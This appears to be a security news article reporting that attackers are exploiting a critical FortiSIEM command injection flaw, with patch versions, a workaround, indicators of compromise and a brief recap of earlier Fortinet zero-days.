**HACKERS NOW EXPLOITING CRITICAL FORTINET FORTI SIEM FLAW IN ATTACKS**

A critical Fortinet FortiSIEM vulnerability, with publicly available proof-of-concept exploit code, is now being abused in attacks. The flaw, identified by security researcher Zach Hanley at penetration testing company Horizon3.ai, allows attackers to execute unauthorized code or commands via crafted TCP requests.

According to Fortinet's explanation on Tuesday, when it released security updates to patch the flaw, an "improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests." This combination of two issues enables arbitrary writes with admin permissions and privilege escalation to root access.

Horizon3.ai has published a technical write-up explaining that the root cause of the issue is the exposure of dozens of command handlers on the phMonitor service, which can be invoked remotely without authentication. The researchers also released proof-of-concept exploit code that allows gaining code execution as root by abusing an argument injection to overwrite the /opt/charting/redishb.sh file.

The flaw affects FortiSIEM versions 6.7 to 7.5 and can be patched by upgrading to FortiSIEM 7.4.1 or later, 7.3.5 or later, 7.2.7 or later, or 7.1.9 or later. Customers using FortiSIEM 7.0.0 through 7.0.4 and FortiSIEM 6.7.0 through 6.7.10 are advised to migrate to a fixed release.

On Tuesday, Fortinet also shared a temporary workaround for admins who can't immediately apply security updates, requiring them to limit access to the phMonitor port (7900). However, threat intelligence firm Defused reported just two days later that threat actors are now actively exploiting the CVE-2025-64155 flaw in the wild.

"Fortinet FortiSIEM vulnerability CVE-2025-64155 is experiencing active, targeted exploitation in our honeypots," Defused warned. Horizon3.ai also provides indicators of compromise to help defenders identify already compromised systems.

As the researchers explained, admins can find evidence of malicious abuse by checking the phMonitor message logs at /opt/phoenix/log/phoenix.logs for payload URLs on lines that contain PHL_ERROR entries. Fortinet has yet to update its security advisory and flag the vulnerability as exploited in attacks.

**BREATHTAKINGLY SHORT TIMEFRAMES**

In November, Fortinet warned that attackers were exploiting a FortiWeb zero-day (CVE-2025-58034), and one week later, it confirmed that it had silently patched a second FortiWeb zero-day (CVE-2025-64446) that was also targeted in widespread attacks. In February 2025, it also revealed that the Chinese Volt Typhoon hacking group exploited two FortiOS vulnerabilities (tracked as CVE-2023-27997 and CVE-2022-42475) to deploy Coathanger remote access trojan malware on a Dutch Ministry of Defence military network.

**7 SECURITY BEST PRACTICES FOR MCP**

As Model Context Protocol (MCP) becomes the standard for connecting Large Language Models (LLMs) to tools and data, security teams are moving fast to keep these new services safe. This free cheat sheet outlines 7 best practices you can start using today.

**LINKS AND RESOURCES**

* [Horizon3.ai Technical Write-up](link) * [Defused Threat Intelligence Report](link) * [Fortinet Security Advisory](link)